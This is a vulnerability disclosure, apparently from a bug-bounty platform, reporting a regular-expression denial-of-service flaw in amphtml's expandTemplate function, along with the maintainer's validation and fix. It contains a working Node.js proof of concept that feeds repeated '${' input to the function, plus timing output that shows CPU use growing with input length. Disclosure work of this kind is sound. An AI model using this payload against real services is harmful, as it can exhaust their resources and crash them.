Inefficient Regular Expression Complexity in ampproject/amphtml

Valid

Reported on

Sep 20th 2021


✍️ Description

The amphtml package is vulnerable to ReDoS (regular expression denial of service). An attacker that is able to provide a crafted template as input to the expandTemplate function of core/types/string/index.js may cause an application to consume an excessive amount of CPU. Below pinned line using vulnerable regex.

🕵️‍♂️ Proof of Concept

Put the below in a poc.mjs file and run with node

import {expandTemplate} from './amphtml/src/core/types/string/index.js';
for(var i = 1; i <= 500; i++) {
    var time = Date.now();
    var payload = ""+"${".repeat(i*10000)+"!"
    expandTemplate(payload)
    var stop_time = Date.now() - time;
    console.log("Payload.length:" + payload.length + ": " + stop_time+" ms");
    }

Check the Output:

Payload.length:20001: 198 ms
Payload.length:40001: 775 ms
Payload.length:60001: 1672 ms
Payload.length:80001: 2991 ms
Payload.length:100001: 5029 ms
Payload.length:120001: 7096 ms
Payload.length:140001: 9171 ms
Payload.length:160001: 11837 ms
--
--

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes.

Occurrences

We created a GitHub Issue asking the maintainers to create a SECURITY.md 8 months ago
Justin Ridgewell validated this vulnerability 18 days ago

https://github.com/ampproject/amphtml/pull/38178

ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Justin Ridgewell confirmed that a fix has been merged on 43b4e8 16 days ago
The fix bounty has been dropped
index.js#L92 has been validated
to join this conversation